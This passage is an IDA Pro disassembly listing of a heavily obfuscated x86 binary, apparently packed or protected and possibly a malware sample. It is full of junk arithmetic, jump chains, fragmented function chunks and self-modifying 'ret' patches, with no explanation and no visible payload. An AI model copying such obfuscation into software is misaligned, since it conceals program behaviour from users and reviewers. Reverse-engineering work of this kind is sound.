		shl	edx, 18h
		jnb	loc_450F29

loc_4505EF:				; CODE XREF: sub_45A2F9:loc_4422E6j
		sub	esi, 0B618E682h
		add	esi, 8CC68ABBh
		xchg	esi, [esp+0]
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_45A2F9
; ---------------------------------------------------------------------------

locret_450603:				; CODE XREF: y2kk37jd:00455B01j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_450604:				; CODE XREF: sub_44DBF8-3F11j
		jnp	loc_450430
		mov	[ebp+0], esi
		sub	ebx, 87E1E3C9h
		jmp	loc_43F5AB
; END OF FUNCTION CHUNK	FOR sub_44DBF8

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_450618	proc near		; CODE XREF: sub_44F3F5j

; FUNCTION CHUNK AT 0043E490 SIZE 00000005 BYTES

		push	ebp

loc_450619:				; CODE XREF: y2kk37jd:loc_4516A0j
		mov	ebp, esp
		push	offset sub_44201B
		jmp	loc_43E490
sub_450618	endp

; ---------------------------------------------------------------------------

loc_450625:				; CODE XREF: y2kk37jd:004441E1j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459F8F

loc_450626:				; CODE XREF: sub_459F8F-8BE1j
		jmp	loc_44824F
; END OF FUNCTION CHUNK	FOR sub_459F8F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45062B:				; CODE XREF: sub_4448E2+78F7j
		jmp	sub_44461D
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_440B03
		jmp	loc_459D39
; ---------------------------------------------------------------------------
		and	ebx, 4583439Dh
		jg	loc_44615A
		jmp	sub_442C50
; ---------------------------------------------------------------------------

loc_45064E:				; CODE XREF: y2kk37jd:loc_43DDD8j
					; DATA XREF: sub_448865+5o
		push	eax
		ror	eax, 0Fh
		mov	ds:dword_447344, eax
		retn
; ---------------------------------------------------------------------------

loc_450659:				; CODE XREF: y2kk37jd:0043DD9Aj
		jmp	loc_4517AE
; ---------------------------------------------------------------------------

loc_45065E:				; CODE XREF: y2kk37jd:0045B3F5j
		jle	loc_45C47D
		pop	ecx
		push	3E36C78Dh
		jmp	loc_43D5B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_45066F:				; CODE XREF: sub_43F75D:loc_445019j
		add	ebx, 24A0137Eh
		popf
		xchg	ebx, [esp+8+var_8]
		jmp	loc_44571F
; END OF FUNCTION CHUNK	FOR sub_43F75D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_365. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_45067F:				; CODE XREF: sub_43F911+D2B2j
		jmp	loc_458E41
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------

loc_450684:				; CODE XREF: y2kk37jd:loc_43DF4Bj
		pop	edx
		rol	edx, 1Eh
		or	edx, 9168ACFDh
		rol	edx, 3
		sub	edx, 194D9DF8h
		add	edx, 6A4AD654h

loc_45069D:				; CODE XREF: y2kk37jd:loc_44B85Ej
		jmp	loc_45BF7F
; ---------------------------------------------------------------------------

loc_4506A2:				; CODE XREF: y2kk37jd:0043CDE0j
		or	edi, eax
		shl	edx, 12h
		add	ebp, 0C2B64DB0h
		or	esi, ecx
		jmp	loc_454C43
; ---------------------------------------------------------------------------
		adc	ebx, ecx
		jmp	sub_448C80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F7C

loc_4506BB:				; CODE XREF: sub_447F7C+1686j
		and	ebx, 20BBCBD2h
		add	ebx, 0FFA9464Fh
		xchg	ebx, [esp+4+var_4]
		jmp	loc_45A52B
; END OF FUNCTION CHUNK	FOR sub_447F7C
; ---------------------------------------------------------------------------
		jmp	ds:off_41E1F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AA5

loc_4506D5:				; CODE XREF: sub_43EF62-F2j
					; sub_447F7C:loc_45A52Bj ...
		jnz	loc_45B107
		xchg	eax, [esp+0]
		mov	edx, eax
		jmp	loc_44B6FF
; END OF FUNCTION CHUNK	FOR sub_440AA5
; ---------------------------------------------------------------------------
		push	esi
		push	7BB431D7h
		pop	esi
		sub	esi, 58D7F5D1h
		jmp	loc_4478B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_4506F7:				; CODE XREF: sub_43E1E9:loc_43E1F6j
		jg	loc_45969E
		jmp	loc_441445
; END OF FUNCTION CHUNK	FOR sub_43E1E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_450702:				; CODE XREF: sub_445226+A4j
		jb	loc_44D9FB
		adc	ecx, ebx
		jmp	loc_44C48C
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_45070F	proc near		; DATA XREF: y2kk37jd:0044A9EEo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C5F1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043FF76 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445724 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045795E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C15D SIZE 00000017 BYTES

		mov	edi, [edi]
		xchg	edi, [esp+0]
		push	dword ptr [ebp+0Ch]
		push	dword ptr [ebp+8]
		call	eax
		jmp	loc_45C15D
sub_45070F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44884D

loc_450721:				; CODE XREF: sub_44884D+7j
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:byte_449C3C,	0
		call	sub_44438E

loc_450732:				; CODE XREF: y2kk37jd:0044DCDDj
		jmp	loc_446041
; END OF FUNCTION CHUNK	FOR sub_44884D
; ---------------------------------------------------------------------------

loc_450737:				; CODE XREF: y2kk37jd:00458891j
		mov	esi, ecx
		xchg	esi, [esp]
		push	263342D1h
		not	ecx
		jmp	loc_455AB0
; ---------------------------------------------------------------------------
		adc	eax, ebp
		xor	esi, eax
		jmp	sub_43CB6C
; ---------------------------------------------------------------------------

loc_450751:				; CODE XREF: y2kk37jd:loc_4516D1j
		jnz	loc_43F15C

loc_450757:				; CODE XREF: y2kk37jd:0045398Bj
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_45075C:				; CODE XREF: sub_43C865+13003j
		jmp	loc_44F964
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_450761:				; CODE XREF: sub_456D3F-1248Aj
		jmp	loc_44EB2E
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------
		cdq
		sub	edi, esi
		jmp	loc_43F15C
; ---------------------------------------------------------------------------

loc_45076E:				; DATA XREF: sub_442DDC:loc_44AC6Do
		add	esi, 1D6822h
		xchg	esi, [esp]
		jmp	loc_45B13F
; ---------------------------------------------------------------------------

loc_45077C:				; CODE XREF: y2kk37jd:loc_44614Bj
		add	edx, 647A2374h
		xor	edx, 33DFB475h
		or	edx, 9FEBEA63h
		add	edx, 20499C55h
		xchg	edx, [esp]
		jmp	sub_443525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_45079C:				; CODE XREF: sub_43ED86:loc_446BC8j
		jz	loc_4546E1
		jmp	loc_44211B
; END OF FUNCTION CHUNK	FOR sub_43ED86
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_342. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4507A8:				; CODE XREF: y2kk37jd:loc_4465A3j
		jnz	loc_44E0D3
		push	ebp
		jmp	loc_45397C
; ---------------------------------------------------------------------------
		dd 96B8F881h, 6CE925C9h
		db 0B7h, 0FEh, 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_4507BF	proc near		; CODE XREF: sub_4480CB+55D4p
					; y2kk37jd:0045C57Aj

var_18		= dword	ptr -18h
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B2A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B690 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C958 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043E6C7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E844 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E937 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044024B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00440DE9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441A41 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441BBF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442745 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442F1F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444AF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444DDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445697 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00445A16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445A9C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00446238 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446600 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00446A51 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00446BB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004470C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447280 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447BCD SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A1D4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A4CD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AD01 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044AD2D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B2BD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B682 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C176 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C72F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044C9EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D8AA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044E06B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045121D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045172E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451E48 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453137 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004533BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453E5C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004542F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454736 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00454842 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454BB2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045525D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004553CC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456972 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004574B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004583B4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004591EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459EF8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045BF16 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045C129 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ebp, [esp-4+arg_0]
		call	sub_44C304
		cmp	dword ptr [ebp-10Ch], 656C6946h
		jnz	loc_4583B4
		jmp	loc_44C9EA
sub_4507BF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_4507E0:				; CODE XREF: y2kk37jd:00453E90j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447977

loc_4507E1:				; CODE XREF: sub_447977+AA3Cj
		jmp	loc_4536E2
; END OF FUNCTION CHUNK	FOR sub_447977
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B6E8

loc_4507E6:				; CODE XREF: sub_44B6E8+1059Ej
					; DATA XREF: y2kk37jd:off_44FB52o
		jz	loc_4577E4
; END OF FUNCTION CHUNK	FOR sub_44B6E8
; START	OF FUNCTION CHUNK FOR sub_443B86

loc_4507EC:				; CODE XREF: sub_443B86+1Cj
		jmp	loc_43F35F
; END OF FUNCTION CHUNK	FOR sub_443B86
; ---------------------------------------------------------------------------
		mov	ebp, 0FDFB3AC6h
		adc	ebp, edx
		adc	esi, 0A95A7D4Dh
		jmp	loc_4577E4
; ---------------------------------------------------------------------------
		test	eax, 0BE910D1Dh
		jmp	loc_43BC54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_45080E:				; CODE XREF: sub_448CAE:loc_4513D1j
		jnz	loc_4551C8

loc_450814:				; CODE XREF: sub_4507BF-13E45j
		jmp	loc_4519AF
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_450819:				; CODE XREF: sub_448DCA-CBB1j
		jmp	loc_45225D
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
		test	esi, eax
		jmp	loc_45B84E
; ---------------------------------------------------------------------------

loc_450825:				; CODE XREF: y2kk37jd:0044A074j
		add	ecx, 620BB86Dh
		popf
		xchg	ecx, [esp]
		jmp	loc_43FBDB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_435. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_450835:				; CODE XREF: sub_43ED86+1044Fj
		jmp	loc_442A57
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B613

loc_45083A:				; CODE XREF: sub_44B613+Cj
		jmp	sub_4586F8
; END OF FUNCTION CHUNK	FOR sub_44B613
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_45083F:				; CODE XREF: sub_44D302+7027j
		call	sub_45651A
		pop	ecx
; END OF FUNCTION CHUNK	FOR sub_44D302
; START	OF FUNCTION CHUNK FOR sub_45430C

loc_450845:				; CODE XREF: sub_45430C+Aj
		mov	[ebp-20h], eax
; END OF FUNCTION CHUNK	FOR sub_45430C
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_450848:				; CODE XREF: sub_44D302-9E65j
					; sub_44D302+701Dj
		jno	loc_4514A3
		test	byte ptr [ebp-7], 8
		jmp	loc_445CA7
; END OF FUNCTION CHUNK	FOR sub_44D302

; =============== S U B	R O U T	I N E =======================================



sub_450857	proc near		; CODE XREF: y2kk37jd:0044A624j
					; sub_440F0C+9739p

; FUNCTION CHUNK AT 00446474 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452952 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BED3 SIZE 00000015 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	esi
		push	ebx
		pushf
		push	0EFE8C1E5h
		pop	ebx
		jmp	loc_452952
sub_450857	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_450869:				; CODE XREF: sub_45689F-5B2Cj
		xchg	ecx, [ebx]
		and	edx, eax
		adc	edx, edi
		ror	ecx, 1Ah

loc_450872:				; CODE XREF: sub_45689F:loc_450D6Bj
		rol	eax, 14h
		jmp	loc_4429A6
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_45087A:				; CODE XREF: sub_43F346+139F5j
		jge	loc_450FF8

loc_450880:				; CODE XREF: sub_446EA8+12972j
		jmp	loc_444B9D
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B583

loc_450885:				; CODE XREF: sub_45B583-112A3j
		jmp	nullsub_397
; END OF FUNCTION CHUNK	FOR sub_45B583
; ---------------------------------------------------------------------------
		mov	[edx], ecx
		jmp	loc_455444

; =============== S U B	R O U T	I N E =======================================



sub_450891	proc near		; CODE XREF: sub_45689F:loc_450FCBp
					; y2kk37jd:loc_4534FAj	...

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 506838D7h
		xchg	edx, [esp-4+arg_0]
		jmp	sub_45405E
sub_450891	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_4508A3:				; CODE XREF: sub_459789:loc_45AEE0j
		jge	loc_44FC65
		jz	loc_44DFCD
		not	ecx
		jmp	loc_44FC65
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4567FD

loc_4508B6:				; CODE XREF: sub_4567FD:loc_44CE45j
		call	sub_4581BB
		lea	eax, [ebp-14h]
		push	eax
		jmp	loc_44A0B9
; END OF FUNCTION CHUNK	FOR sub_4567FD

; =============== S U B	R O U T	I N E =======================================



sub_4508C4	proc near		; CODE XREF: sub_4567FD:loc_44F115j

; FUNCTION CHUNK AT 004485F0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004516B0 SIZE 00000005 BYTES

		add	esp, 0FFFFFFECh
		mov	eax, offset dword_449C20
		call	sub_443688
		jmp	loc_4516B0
sub_4508C4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_4508D6:				; CODE XREF: sub_449E69-DA21j
					; sub_452C0C-167AAj
		call	sub_45024B
		pop	ecx
		shl	eax, 3
		mov	edx, [ebp+8]
		push	offset sub_44E4C0

loc_4508E7:				; CODE XREF: y2kk37jd:loc_446C00j
		jmp	nullsub_205
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4508EC:				; CODE XREF: sub_453867-27C5j
		mov	[edi], eax
		pop	edi
		lea	eax, sub_43FDE6
		mov	byte ptr [eax],	0C3h
		jmp	loc_44E276
; END OF FUNCTION CHUNK	FOR sub_453867

; =============== S U B	R O U T	I N E =======================================



sub_4508FD	proc near		; CODE XREF: sub_4198C0+C8p
					; y2kk37jd:00458544j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447709 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004527DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452FF9 SIZE 00000015 BYTES

		push	ebx
		push	0D76CBD73h
		jmp	loc_4527DA
sub_4508FD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_450908:				; CODE XREF: sub_4578A6:loc_45671Aj
		xor	ecx, 0E63E3E8Fh
		test	ecx, 40h
		jmp	loc_43C2EF
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_450919:				; CODE XREF: sub_44346B+Ej
		jnz	loc_4446F0
		jmp	loc_45AE3A
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------

loc_450924:				; CODE XREF: y2kk37jd:loc_43DC47j
		push	0EA77F7CAh
		pop	esi
		sub	esi, 6B9C07D7h
		add	esi, 81241029h
		xchg	esi, [esp]
		lea	eax, [ebp-34h]
		push	edx
		push	eax
		jmp	loc_45C5B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_450943:				; CODE XREF: sub_4448E2+5E85j
		jno	loc_443AAD
		cmp	eax, 1FCDC085h
		jmp	loc_4591FA
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_450954:				; CODE XREF: y2kk37jd:00450E4Bj
		jnz	loc_45013A
		jmp	loc_43D39C

; =============== S U B	R O U T	I N E =======================================



sub_45095F	proc near		; CODE XREF: sub_4447EA+7DB3p
					; y2kk37jd:004594AAj

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		add	ecx, 3D8406EBh
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_458681
sub_45095F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:dword_450BC8, eax
		push	ecx
		push	6A6D7037h
		jmp	loc_44BF6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B0A5

loc_450981:				; CODE XREF: sub_45B0A5-25D2j
		push	edx

loc_450982:				; CODE XREF: sub_45B0A5:loc_44D779j
		push	90DAF139h
		pop	eax
		or	eax, 0B9C9A80Ch
		xor	eax, 0B9DBF95Fh
		push	edx
		pushf
		push	9351D33Dh
		jmp	loc_448168
; END OF FUNCTION CHUNK	FOR sub_45B0A5

; =============== S U B	R O U T	I N E =======================================



sub_4509A0	proc near		; DATA XREF: sub_44A011+103F3o

; FUNCTION CHUNK AT 00453DAA SIZE 0000000F BYTES

		add	edx, ebp
		push	eax
		push	0B355A45Eh
		pop	eax
		xor	eax, 42DAA506h
		or	eax, 89CCB160h
		add	eax, 41199BCFh
		xor	eax, 6F368C9Dh
		jmp	loc_453DAA
sub_4509A0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4509C6	proc near		; DATA XREF: y2kk37jd:0045C065o
		lea	eax, loc_45B26A
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B26A
sub_4509C6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_4509D4:				; CODE XREF: sub_43DF1F:loc_45B26Aj
		pop	edx
		mov	eax, [esp+0]
		push	edx
		jmp	loc_43F51B
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459546

loc_4509DE:				; CODE XREF: sub_459546:loc_445FE0j
		pushf
		push	98D0528Fh
		pop	ecx
		xor	ecx, 0EBB182h
		jmp	loc_450B5F
; END OF FUNCTION CHUNK	FOR sub_459546
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_4509F0:				; CODE XREF: sub_44AFF6-2772j
		jz	loc_43C939
		jmp	loc_449C4A
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; ---------------------------------------------------------------------------
		jmp	loc_4430B0
; ---------------------------------------------------------------------------
		mov	dword ptr [ebp-8], 1
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_450A07:				; CODE XREF: sub_445226:loc_445503j
					; sub_43BD0D+1D2AEj
		mov	eax, [ebp-8]
		mov	esp, ebp
		pop	ebp
		retn	8
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------

loc_450A10:				; CODE XREF: y2kk37jd:0043B264j
		jnb	loc_45A6AC

; =============== S U B	R O U T	I N E =======================================



sub_450A16	proc near		; CODE XREF: y2kk37jd:0043F1EDp

; FUNCTION CHUNK AT 00445EA7 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		pushf

loc_450A1B:				; CODE XREF: y2kk37jd:0044F7FAj
		add	eax, 767261D0h
		add	eax, 898D9E34h
		push	offset sub_43F567
		jmp	loc_445EA7
sub_450A16	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_450A31:				; CODE XREF: sub_44B814:loc_446660j
		mov	ecx, ebp
		jmp	loc_45B66E
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------

loc_450A38:				; CODE XREF: y2kk37jd:004459B2j
		jnz	loc_449280
		add	eax, edx

loc_450A40:				; CODE XREF: y2kk37jd:loc_4459A4j
		sub	eax, 408456F7h
		xor	eax, 0F844A5E5h
		add	eax, ebp
		jmp	loc_45BDAD
; ---------------------------------------------------------------------------
		jmp	ds:off_41E040
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_450A59:				; CODE XREF: sub_44610D+14186j
		jmp	loc_442855
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_450A5E:				; CODE XREF: y2kk37jd:00454501j
					; sub_445787+F8E1j
		jmp	nullsub_325
; ---------------------------------------------------------------------------

loc_450A63:				; CODE XREF: sub_445787-A722j
		jmp	loc_44068A
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_450A68:				; CODE XREF: sub_4450D1+8F74j
					; sub_4450D1+C4FEj ...
		xchg	ebp, [esp+8+var_8]
		mov	edx, ebp
		pop	ebp
		jns	loc_4515D4
		mov	eax, [esp+4+var_4]
		push	esi
		jmp	loc_43C27F
; END OF FUNCTION CHUNK	FOR sub_4450D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C1D5

loc_450A7D:				; CODE XREF: sub_43C1D5:loc_4562A7j
		push	offset loc_4477E4
		jmp	nullsub_180
; END OF FUNCTION CHUNK	FOR sub_43C1D5
; ---------------------------------------------------------------------------

loc_450A87:				; CODE XREF: y2kk37jd:loc_45B893j
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp]
; START	OF FUNCTION CHUNK FOR sub_454251

loc_450A8D:				; CODE XREF: sub_454251:loc_447C21j
		push	esi
		push	3F167818h
		pop	esi
		or	esi, 0F5FF56D9h
		jmp	loc_453E95
; END OF FUNCTION CHUNK	FOR sub_454251
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6BF

loc_450A9F:				; CODE XREF: sub_44D6BF:loc_450169j
					; sub_44D6BF+4242j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44680C
		jmp	loc_443610
; END OF FUNCTION CHUNK	FOR sub_44D6BF

; =============== S U B	R O U T	I N E =======================================



sub_450AB0	proc near		; DATA XREF: sub_445226:loc_456880o
		push	eax
		call	sub_450216
sub_450AB0	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_453849

loc_450AB6:				; CODE XREF: sub_453849+6j
		jmp	loc_44C68F
; END OF FUNCTION CHUNK	FOR sub_453849
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_450ABB:				; CODE XREF: sub_43C7B9+15D3Fj
		jmp	nullsub_470
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_450AC0:				; CODE XREF: sub_44D51F+24ECj
		jmp	loc_44C1DE
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_450AC5:				; CODE XREF: sub_43F75D:loc_44A4A3j
		push	ecx

loc_450AC6:				; CODE XREF: y2kk37jd:00450DBFj
		push	77587D28h
		pop	ecx
		rol	ecx, 1Dh
		or	ecx, 0CC8ADA2Dh
		test	ecx, 4000h
		jmp	loc_446088
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
		push	98875DCBh
		jmp	sub_43B7F3
; ---------------------------------------------------------------------------

loc_450AEA:				; CODE XREF: y2kk37jd:0044C425j
		mov	[ecx], edx
		jmp	loc_4569A7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_406. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_450AF2:				; CODE XREF: sub_4514DE-261Bj
		jmp	loc_43DA12
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------

loc_450AF7:				; CODE XREF: y2kk37jd:0044A81Fj
		jmp	loc_45C15D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_450AFC:				; CODE XREF: sub_43C851:loc_447B39j
		mov	eax, [ebp-14h]
		mov	eax, [eax+18h]
		dec	eax
		test	eax, eax
		jl	loc_459FF4
		jmp	loc_446869
; END OF FUNCTION CHUNK	FOR sub_43C851

; =============== S U B	R O U T	I N E =======================================



sub_450B10	proc near		; DATA XREF: sub_4448E2-451o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044B229 SIZE 00000005 BYTES

		push	esi
		push	0CE0C018h
		pop	esi
		rol	esi, 9
		add	esi, 3EC3B268h

loc_450B20:				; CODE XREF: y2kk37jd:loc_44FBF0j
		xchg	esi, [esp+4+var_4]
		jmp	loc_44B229
sub_450B10	endp

; ---------------------------------------------------------------------------

loc_450B28:				; CODE XREF: y2kk37jd:00451FA1j
		jbe	loc_448058
		mov	edi, eax

; =============== S U B	R O U T	I N E =======================================



sub_450B30	proc near		; CODE XREF: sub_447659+FC77p

; FUNCTION CHUNK AT 0043F311 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004493A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456ED5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A51A SIZE 0000000B BYTES

